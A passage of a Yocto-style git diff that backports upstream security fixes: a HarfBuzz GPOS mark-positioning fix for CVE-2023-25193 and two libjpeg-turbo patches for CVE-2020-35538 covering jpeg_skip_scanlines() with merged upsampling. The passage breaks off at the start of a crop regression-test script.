+-    unsigned int base_index = (this+baseCoverage).get_coverage  (buffer->info[skippy_iter.idx].codepoint);
+-    if (base_index == NOT_COVERED) return_trace (false);
++    unsigned int base_index = (this+baseCoverage).get_coverage  (buffer->info[idx].codepoint);
++    if (base_index == NOT_COVERED)
++    {
++      buffer->unsafe_to_concat_from_outbuffer (idx, buffer->idx + 1);
++      return_trace (false);
++    }
+ 
+-    return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, skippy_iter.idx));
++    return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, idx));
+   }
+ 
+   bool subset (hb_subset_context_t *c) const
+@@ -1587,15 +1615,32 @@ struct MarkLigPosFormat1
+     if (likely (mark_index == NOT_COVERED)) return_trace (false);
+ 
+     /* Now we search backwards for a non-mark glyph */
++
+     hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+-    skippy_iter.reset (buffer->idx, 1);
+     skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+-    if (!skippy_iter.prev ()) return_trace (false);
++
++    unsigned j;
++    for (j = buffer->idx; j > c->last_base_until; j--)
++    {
++      auto match = skippy_iter.match (buffer->info[j - 1]);
++      if (match == skippy_iter.MATCH)
++      {
++       c->last_base = (signed) j - 1;
++       break;
++      }
++    }
++    c->last_base_until = buffer->idx;
++    if (c->last_base == -1)
++    {
++      buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++      return_trace (false);
++    }
++
++    j = (unsigned) c->last_base;
+ 
+     /* Checking that matched glyph is actually a ligature by GDEF is too strong; disabled */
+-    //if (!_hb_glyph_info_is_ligature (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++    //if (!_hb_glyph_info_is_ligature (&buffer->info[idx])) { return_trace (false); }
+ 
+-    unsigned int j = skippy_iter.idx;
+     unsigned int lig_index = (this+ligatureCoverage).get_coverage  (buffer->info[j].codepoint);
+     if (lig_index == NOT_COVERED) return_trace (false);
+ 
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 5a7e564..437123c 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -503,6 +503,9 @@ struct hb_ot_apply_context_t :
+   uint32_t random_state;
+ 
+ 
++  signed last_base = -1; // GPOS uses
++  unsigned last_base_until = 0; // GPOS uses
++
+   hb_ot_apply_context_t (unsigned int table_index_,
+ 		      hb_font_t *font_,
+ 		      hb_buffer_t *buffer_) :
+@@ -536,7 +539,7 @@ struct hb_ot_apply_context_t :
+     iter_context.init (this, true);
+   }
+ 
+-  void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; init_iters (); }
++  void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; last_base = -1; last_base_until = 0; init_iters (); }
+   void set_auto_zwj (bool auto_zwj_) { auto_zwj = auto_zwj_; init_iters (); }
+   void set_auto_zwnj (bool auto_zwnj_) { auto_zwnj = auto_zwnj_; init_iters (); }
+   void set_random (bool random_) { random = random_; }
diff --git a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
index ee08c12bee..0cfe01f1e5 100644
--- a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
@@ -7,7 +7,10 @@ LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://COPYING;md5=e11f5c3149cdec4bb309babb020b32b9 \
                     file://src/hb-ucd.cc;beginline=1;endline=15;md5=29d4dcb6410429195df67efe3382d8bc"
 
-SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz"
+SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz \
+           file://CVE-2023-25193-pre0.patch \
+           file://CVE-2023-25193-pre1.patch \
+           file://CVE-2023-25193.patch"
 SRC_URI[md5sum] = "2b3a4dfdb3e5e50055f941978944da9f"
 SRC_URI[sha256sum] = "9413b8d96132d699687ef914ebb8c50440efc87b3f775d25856d7ec347c03c12"
 
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
new file mode 100644
index 0000000000..8a52ed01e9
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
@@ -0,0 +1,457 @@
+From 9120a247436e84c0b4eea828cb11e8f665fcde30 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Thu, 23 Jul 2020 21:24:38 -0500
+Subject: [PATCH] Fix jpeg_skip_scanlines() segfault w/merged upsamp
+
+The additional segfault mentioned in #244 was due to the fact that
+the merged upsamplers use a different private structure than the
+non-merged upsamplers.  jpeg_skip_scanlines() was assuming the latter, so
+when merged upsampling was enabled, jpeg_skip_scanlines() clobbered one
+of the IDCT method pointers in the merged upsampler's private structure.
+
+For reasons unknown, the test image in #441 did not encounter this
+segfault (too small?), but it encountered an issue similar to the one
+fixed in 5bc43c7821df982f65aa1c738f67fbf7cba8bd69, whereby it was
+necessary to set up a dummy postprocessing function in
+read_and_discard_scanlines() when merged upsampling was enabled.
+Failing to do so caused either a segfault in merged_2v_upsample() (due
+to a NULL pointer being passed to jcopy_sample_rows()) or an error
+("Corrupt JPEG data: premature end of data segment"), depending on the
+number of scanlines skipped and whether the first scanline skipped was
+an odd- or even-numbered row.
+
+Fixes #441
+Fixes #244 (for real this time)
+
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9120a247436e84c0b4eea828cb11e8f665fcde30]
+CVE: CVE-2020-35538
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ChangeLog.md |  7 +++++
+ jdapistd.c   | 72 ++++++++++++++++++++++++++++++++++++++++++++++------
+ jdmerge.c    | 46 +++++++--------------------------
+ jdmerge.h    | 47 ++++++++++++++++++++++++++++++++++
+ jdmrg565.c   | 10 ++++----
+ jdmrgext.c   |  6 ++---
+ 6 files changed, 135 insertions(+), 53 deletions(-)
+ create mode 100644 jdmerge.h
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 2ebfe71..19d18fa 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -54,6 +54,13 @@ a 16-bit binary PGM file into an RGB image buffer.
+ generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
+ file into an extended RGB image buffer.
+ 
++2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
++in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
++images using the merged (non-fancy) upsampling algorithms (that is, when
++setting `cinfo.do_fancy_upsampling` to `FALSE`.)  2.0.0[6] was a similar fix,
++but it did not cover all cases.
++
++
+ 2.0.3
+ =====
+ 
+diff --git a/jdapistd.c b/jdapistd.c
+index 2c808fa..91da642 100644
+--- a/jdapistd.c
++++ b/jdapistd.c
+@@ -4,7 +4,7 @@
+  * This file was part of the Independent JPEG Group's software:
+  * Copyright (C) 1994-1996, Thomas G. Lane.
+  * libjpeg-turbo Modifications:
+- * Copyright (C) 2010, 2015-2018, D. R. Commander.
++ * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
+  * Copyright (C) 2015, Google, Inc.
+  * For conditions of distribution and use, see the accompanying README.ijg
+  * file.
+@@ -21,6 +21,8 @@
+ #include "jinclude.h"
+ #include "jdmainct.h"
+ #include "jdcoefct.h"
++#include "jdmaster.h"
++#include "jdmerge.h"
+ #include "jdsample.h"
+ #include "jmemsys.h"
+ 
+@@ -304,6 +306,16 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+ }
+ 
+ 
++/* Dummy postprocessing function used by jpeg_skip_scanlines() */
++LOCAL(void)
++noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++                   JDIMENSION *in_row_group_ctr,
++                   JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
++                   JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
++{
++}
++
++
+ /*
+  * In some cases, it is best to call jpeg_read_scanlines() and discard the
+  * output, rather than skipping the scanlines, because this allows us to
+@@ -316,11 +328,17 @@ LOCAL(void)
+ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+   JDIMENSION n;
++  my_master_ptr master = (my_master_ptr)cinfo->master;
+   void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+                          JDIMENSION input_row, JSAMPARRAY output_buf,
+                          int num_rows) = NULL;
+   void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
+                           JSAMPARRAY output_buf, int num_rows) = NULL;
++  void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++                             JDIMENSION *in_row_group_ctr,
++                             JDIMENSION in_row_groups_avail,
++                             JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
++                             JDIMENSION out_rows_avail) = NULL;
+ 
+   if (cinfo->cconvert && cinfo->cconvert->color_convert) {
+     color_convert = cinfo->cconvert->color_convert;
+@@ -332,6 +350,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+     cinfo->cquantize->color_quantize = noop_quantize;
+   }
+ 
++  if (master->using_merged_upsample && cinfo->post &&
++      cinfo->post->post_process_data) {
++    post_process_data = cinfo->post->post_process_data;
++    cinfo->post->post_process_data = noop_post_process;
++  }
++
+   for (n = 0; n < num_lines; n++)
+     jpeg_read_scanlines(cinfo, NULL, 1);
+ 
+@@ -340,6 +364,9 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ 
+   if (color_quantize)
+     cinfo->cquantize->color_quantize = color_quantize;
++
++  if (post_process_data)
++    cinfo->post->post_process_data = post_process_data;
+ }
+ 
+ 
+@@ -382,7 +409,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+ {
+   my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
+   my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_master_ptr master = (my_master_ptr)cinfo->master;
+   JDIMENSION i, x;
+   int y;
+   JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
+@@ -445,8 +472,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+     main_ptr->buffer_full = FALSE;
+     main_ptr->rowgroup_ctr = 0;
+     main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
+-    upsample->next_row_out = cinfo->max_v_samp_factor;
+-    upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++    if (master->using_merged_upsample) {
++      my_merged_upsample_ptr upsample =
++        (my_merged_upsample_ptr)cinfo->upsample;
++      upsample->spare_full = FALSE;
++      upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++    } else {
++      my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++      upsample->next_row_out = cinfo->max_v_samp_factor;
++      upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++    }
+   }
+ 
+   /* Skipping is much simpler when context rows are not required. */
+@@ -458,8 +493,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+       cinfo->output_scanline += lines_left_in_iMCU_row;
+       main_ptr->buffer_full = FALSE;
+       main_ptr->rowgroup_ctr = 0;
+-      upsample->next_row_out = cinfo->max_v_samp_factor;
+-      upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++      if (master->using_merged_upsample) {
++        my_merged_upsample_ptr upsample =
++          (my_merged_upsample_ptr)cinfo->upsample;
++        upsample->spare_full = FALSE;
++        upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++      } else {
++        my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++        upsample->next_row_out = cinfo->max_v_samp_factor;
++        upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++      }
+     }
+   }
+ 
+@@ -494,7 +537,14 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+       cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
+       increment_simple_rowgroup_ctr(cinfo, lines_to_read);
+     }
+-    upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++    if (master->using_merged_upsample) {
++      my_merged_upsample_ptr upsample =
++        (my_merged_upsample_ptr)cinfo->upsample;
++      upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++    } else {
++      my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++      upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++    }
+     return num_lines;
+   }
+ 
+@@ -535,7 +585,13 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
+    * bit odd, since "rows_to_go" seems to be redundantly keeping track of
+    * output_scanline.
+    */
+-  upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++  if (master->using_merged_upsample) {
++    my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
++    upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++  } else {
++    my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++    upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
++  }
+ 
+   /* Always skip the requested number of lines. */
+   return num_lines;
+diff --git a/jdmerge.c b/jdmerge.c
+index dff5a35..833ad67 100644
+--- a/jdmerge.c
++++ b/jdmerge.c
+@@ -5,7 +5,7 @@
+  * Copyright (C) 1994-1996, Thomas G. Lane.
+  * libjpeg-turbo Modifications:
+  * Copyright 2009 Pierre Ossman <ossman@cendio.se> for Cendio AB
+- * Copyright (C) 2009, 2011, 2014-2015, D. R. Commander.
++ * Copyright (C) 2009, 2011, 2014-2015, 2020, D. R. Commander.
+  * Copyright (C) 2013, Linaro Limited.
+  * For conditions of distribution and use, see the accompanying README.ijg
+  * file.
+@@ -40,41 +40,13 @@
+ #define JPEG_INTERNALS
+ #include "jinclude.h"
+ #include "jpeglib.h"
++#include "jdmerge.h"
+ #include "jsimd.h"
+ #include "jconfigint.h"
+ 
+ #ifdef UPSAMPLE_MERGING_SUPPORTED
+ 
+ 
+-/* Private subobject */
+-
+-typedef struct {
+-  struct jpeg_upsampler pub;    /* public fields */
+-
+-  /* Pointer to routine to do actual upsampling/conversion of one row group */
+-  void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+-                    JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
+-
+-  /* Private state for YCC->RGB conversion */
+-  int *Cr_r_tab;                /* => table for Cr to R conversion */
+-  int *Cb_b_tab;                /* => table for Cb to B conversion */
+-  JLONG *Cr_g_tab;              /* => table for Cr to G conversion */
+-  JLONG *Cb_g_tab;              /* => table for Cb to G conversion */
+-
+-  /* For 2:1 vertical sampling, we produce two output rows at a time.
+-   * We need a "spare" row buffer to hold the second output row if the
+-   * application provides just a one-row buffer; we also use the spare
+-   * to discard the dummy last row if the image height is odd.
+-   */
+-  JSAMPROW spare_row;
+-  boolean spare_full;           /* T if spare buffer is occupied */
+-
+-  JDIMENSION out_row_width;     /* samples per output row */
+-  JDIMENSION rows_to_go;        /* counts rows remaining in image */
+-} my_upsampler;
+-
+-typedef my_upsampler *my_upsample_ptr;
+-
+ #define SCALEBITS       16      /* speediest right-shift on some machines */
+ #define ONE_HALF        ((JLONG)1 << (SCALEBITS - 1))
+ #define FIX(x)          ((JLONG)((x) * (1L << SCALEBITS) + 0.5))
+@@ -189,7 +161,7 @@ typedef my_upsampler *my_upsample_ptr;
+ LOCAL(void)
+ build_ycc_rgb_table(j_decompress_ptr cinfo)
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+   int i;
+   JLONG x;
+   SHIFT_TEMPS
+@@ -232,7 +204,7 @@ build_ycc_rgb_table(j_decompress_ptr cinfo)
+ METHODDEF(void)
+ start_pass_merged_upsample(j_decompress_ptr cinfo)
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ 
+   /* Mark the spare buffer empty */
+   upsample->spare_full = FALSE;
+@@ -254,7 +226,7 @@ merged_2v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+                    JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+ /* 2:1 vertical sampling case: may need a spare row. */
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+   JSAMPROW work_ptrs[2];
+   JDIMENSION num_rows;          /* number of rows returned to caller */
+ 
+@@ -305,7 +277,7 @@ merged_1v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+                    JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
+ /* 1:1 vertical sampling case: much easier, never need a spare row. */
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+ 
+   /* Just do the upsampling. */
+   (*upsample->upmethod) (cinfo, input_buf, *in_row_group_ctr,
+@@ -566,11 +538,11 @@ h2v2_merged_upsample_565D(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+ GLOBAL(void)
+ jinit_merged_upsampler(j_decompress_ptr cinfo)
+ {
+-  my_upsample_ptr upsample;
++  my_merged_upsample_ptr upsample;
+ 
+-  upsample = (my_upsample_ptr)
++  upsample = (my_merged_upsample_ptr)
+     (*cinfo->mem->alloc_small) ((j_common_ptr)cinfo, JPOOL_IMAGE,
+-                                sizeof(my_upsampler));
++                                sizeof(my_merged_upsampler));
+   cinfo->upsample = (struct jpeg_upsampler *)upsample;
+   upsample->pub.start_pass = start_pass_merged_upsample;
+   upsample->pub.need_context_rows = FALSE;
+diff --git a/jdmerge.h b/jdmerge.h
+new file mode 100644
+index 0000000..b583396
+--- /dev/null
++++ b/jdmerge.h
+@@ -0,0 +1,47 @@
++/*
++ * jdmerge.h
++ *
++ * This file was part of the Independent JPEG Group's software:
++ * Copyright (C) 1994-1996, Thomas G. Lane.
++ * libjpeg-turbo Modifications:
++ * Copyright (C) 2020, D. R. Commander.
++ * For conditions of distribution and use, see the accompanying README.ijg
++ * file.
++ */
++
++#define JPEG_INTERNALS
++#include "jpeglib.h"
++
++#ifdef UPSAMPLE_MERGING_SUPPORTED
++
++
++/* Private subobject */
++
++typedef struct {
++  struct jpeg_upsampler pub;    /* public fields */
++
++  /* Pointer to routine to do actual upsampling/conversion of one row group */
++  void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
++                    JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
++
++  /* Private state for YCC->RGB conversion */
++  int *Cr_r_tab;                /* => table for Cr to R conversion */
++  int *Cb_b_tab;                /* => table for Cb to B conversion */
++  JLONG *Cr_g_tab;              /* => table for Cr to G conversion */
++  JLONG *Cb_g_tab;              /* => table for Cb to G conversion */
++
++  /* For 2:1 vertical sampling, we produce two output rows at a time.
++   * We need a "spare" row buffer to hold the second output row if the
++   * application provides just a one-row buffer; we also use the spare
++   * to discard the dummy last row if the image height is odd.
++   */
++  JSAMPROW spare_row;
++  boolean spare_full;           /* T if spare buffer is occupied */
++
++  JDIMENSION out_row_width;     /* samples per output row */
++  JDIMENSION rows_to_go;        /* counts rows remaining in image */
++} my_merged_upsampler;
++
++typedef my_merged_upsampler *my_merged_upsample_ptr;
++
++#endif /* UPSAMPLE_MERGING_SUPPORTED */
+diff --git a/jdmrg565.c b/jdmrg565.c
+index 1b87e37..53f1e16 100644
+--- a/jdmrg565.c
++++ b/jdmrg565.c
+@@ -5,7 +5,7 @@
+  * Copyright (C) 1994-1996, Thomas G. Lane.
+  * libjpeg-turbo Modifications:
+  * Copyright (C) 2013, Linaro Limited.
+- * Copyright (C) 2014-2015, 2018, D. R. Commander.
++ * Copyright (C) 2014-2015, 2018, 2020, D. R. Commander.
+  * For conditions of distribution and use, see the accompanying README.ijg
+  * file.
+  *
+@@ -19,7 +19,7 @@ h2v1_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+                                   JDIMENSION in_row_group_ctr,
+                                   JSAMPARRAY output_buf)
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+   register int y, cred, cgreen, cblue;
+   int cb, cr;
+   register JSAMPROW outptr;
+@@ -90,7 +90,7 @@ h2v1_merged_upsample_565D_internal(j_decompress_ptr cinfo,
+                                    JDIMENSION in_row_group_ctr,
+                                    JSAMPARRAY output_buf)
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+   register int y, cred, cgreen, cblue;
+   int cb, cr;
+   register JSAMPROW outptr;
+@@ -163,7 +163,7 @@ h2v2_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+                                   JDIMENSION in_row_group_ctr,
+                                   JSAMPARRAY output_buf)
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+   register int y, cred, cgreen, cblue;
+   int cb, cr;
+   register JSAMPROW outptr0, outptr1;
+@@ -259,7 +259,7 @@ h2v2_merged_upsample_565D_internal(j_decompress_ptr cinfo,
+                                    JDIMENSION in_row_group_ctr,
+                                    JSAMPARRAY output_buf)
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+   register int y, cred, cgreen, cblue;
+   int cb, cr;
+   register JSAMPROW outptr0, outptr1;
+diff --git a/jdmrgext.c b/jdmrgext.c
+index b1c27df..c9a44d8 100644
+--- a/jdmrgext.c
++++ b/jdmrgext.c
+@@ -4,7 +4,7 @@
+  * This file was part of the Independent JPEG Group's software:
+  * Copyright (C) 1994-1996, Thomas G. Lane.
+  * libjpeg-turbo Modifications:
+- * Copyright (C) 2011, 2015, D. R. Commander.
++ * Copyright (C) 2011, 2015, 2020, D. R. Commander.
+  * For conditions of distribution and use, see the accompanying README.ijg
+  * file.
+  *
+@@ -25,7 +25,7 @@ h2v1_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+                               JDIMENSION in_row_group_ctr,
+                               JSAMPARRAY output_buf)
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+   register int y, cred, cgreen, cblue;
+   int cb, cr;
+   register JSAMPROW outptr;
+@@ -97,7 +97,7 @@ h2v2_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
+                               JDIMENSION in_row_group_ctr,
+                               JSAMPARRAY output_buf)
+ {
+-  my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
++  my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
+   register int y, cred, cgreen, cblue;
+   int cb, cr;
+   register JSAMPROW outptr0, outptr1;
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
new file mode 100644
index 0000000000..f86175dff0
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
@@ -0,0 +1,400 @@
+From a46c111d9f3642f0ef3819e7298846ccc61869e0 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Mon, 27 Jul 2020 14:21:23 -0500
+Subject: [PATCH] Further jpeg_skip_scanlines() fixes
+
+- Introduce a partial image decompression regression test script that
+  validates the correctness of jpeg_skip_scanlines() and
+  jpeg_crop_scanlines() for a variety of cropping regions and libjpeg
+  settings.
+
+  This regression test catches the following issues:
+  #182, fixed in 5bc43c7
+  #237, fixed in 6e95c08
+  #244, fixed in 398c1e9
+  #441, fully fixed in this commit
+
+  It does not catch the following issues:
+  #194, fixed in 773040f
+  #244 (additional segfault), fixed in
+       9120a24
+
+- Modify the libjpeg-turbo regression test suite (make test) so that it
+  checks for the issue reported in #441 (segfault in
+  jpeg_skip_scanlines() when used with 4:2:0 merged upsampling/color
+  conversion.)
+
+- Fix issues in jpeg_skip_scanlines() that caused incorrect output with
+  h2v2 (4:2:0) merged upsampling/color conversion.  The previous commit
+  fixed the segfault reported in #441, but that was a symptom of a
+  larger problem.  Because merged 4:2:0 upsampling uses a "spare row"
+  buffer, it is necessary to allow the upsampler to run when skipping
+  rows (fancy 4:2:0 upsampling, which uses context rows, also requires
+  this.)  Otherwise, if skipping starts at an odd-numbered row, the
+  output image will be incorrect.
+
+- Throw an error if jpeg_skip_scanlines() is called with two-pass color
+  quantization enabled.  With two-pass color quantization, the first
+  pass occurs within jpeg_start_decompress(), so subsequent calls to
+  jpeg_skip_scanlines() interfere with the multipass state and prevent
+  the second pass from occurring during subsequent calls to
+  jpeg_read_scanlines().
+
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/a46c111d9f3642f0ef3819e7298846ccc61869e0]
+CVE: CVE-2020-35538
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ CMakeLists.txt |  9 +++--
+ ChangeLog.md   | 15 +++++---
+ croptest.in    | 95 ++++++++++++++++++++++++++++++++++++++++++++++++++
+ jdapistd.c     | 70 +++++++++++--------------------------
+ libjpeg.txt    |  6 ++--
+ 5 files changed, 136 insertions(+), 59 deletions(-)
+ create mode 100755 croptest.in
+
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index aee74c9..de451f4 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -753,7 +753,7 @@ else()
+   set(MD5_PPM_3x2_IFAST fd283664b3b49127984af0a7f118fccd)
+   set(MD5_JPEG_420_ISLOW_ARI e986fb0a637a8d833d96e8a6d6d84ea1)
+   set(MD5_JPEG_444_ISLOW_PROGARI 0a8f1c8f66e113c3cf635df0a475a617)
+-  set(MD5_PPM_420M_IFAST_ARI 72b59a99bcf1de24c5b27d151bde2437)
++  set(MD5_PPM_420M_IFAST_ARI 57251da28a35b46eecb7177d82d10e0e)
+   set(MD5_JPEG_420_ISLOW 9a68f56bc76e466aa7e52f415d0f4a5f)
+   set(MD5_PPM_420M_ISLOW_2_1 9f9de8c0612f8d06869b960b05abf9c9)
+   set(MD5_PPM_420M_ISLOW_15_8 b6875bc070720b899566cc06459b63b7)
+@@ -1131,7 +1131,7 @@ foreach(libtype ${TEST_LIBTYPES})
+ 
+   if(WITH_ARITH_DEC)
+     # CC: RGB->YCC  SAMP: h2v2 merged  IDCT: ifast  ENT: arith
+-    add_bittest(djpeg 420m-ifast-ari "-fast;-ppm"
++    add_bittest(djpeg 420m-ifast-ari "-fast;-skip;1,20;-ppm"
+       testout_420m_ifast_ari.ppm ${TESTIMAGES}/testimgari.jpg
+       ${MD5_PPM_420M_IFAST_ARI})
+ 
+@@ -1266,6 +1266,11 @@ endforeach()
+ add_custom_target(testclean COMMAND ${CMAKE_COMMAND} -P
+   ${CMAKE_CURRENT_SOURCE_DIR}/cmakescripts/testclean.cmake)
+ 
++configure_file(croptest.in croptest @ONLY)
++add_custom_target(croptest
++  COMMAND echo croptest
++  COMMAND ${BASH} ${CMAKE_CURRENT_BINARY_DIR}/croptest)
++
+ if(WITH_TURBOJPEG)
+   configure_file(tjbenchtest.in tjbenchtest @ONLY)
+   configure_file(tjexampletest.in tjexampletest @ONLY)
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 19d18fa..4562eff 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -54,11 +54,16 @@ a 16-bit binary PGM file into an RGB image buffer.
+ generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
+ file into an extended RGB image buffer.
+ 
+-2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
+-in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
+-images using the merged (non-fancy) upsampling algorithms (that is, when
+-setting `cinfo.do_fancy_upsampling` to `FALSE`.)  2.0.0[6] was a similar fix,
+-but it did not cover all cases.
++2. Fixed or worked around multiple issues with `jpeg_skip_scanlines()`:
++
++     - Fixed segfaults or "Corrupt JPEG data: premature end of data segment"
++errors in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or
++4:2:0 JPEG images using merged (non-fancy) upsampling/color conversion (that
++is, when setting `cinfo.do_fancy_upsampling` to `FALSE`.)  2.0.0[6] was a
++similar fix, but it did not cover all cases.
++     - `jpeg_skip_scanlines()` now throws an error if two-pass color
++quantization is enabled.  Two-pass color quantization never worked properly
++with `jpeg_skip_scanlines()`, and the issues could not readily be fixed.
+ 
+ 
+ 2.0.3
+diff --git a/croptest.in b/croptest.in
+new file mode 100755
+index 0000000..7e3c293
+--- /dev/null
++++ b/croptest.in
+@@ -0,0 +1,95 @@
++#!/bin/bash
++
++set -u
++set -e
++trap onexit INT
++trap onexit TERM
++trap onexit EXIT
++
++onexit()
++{
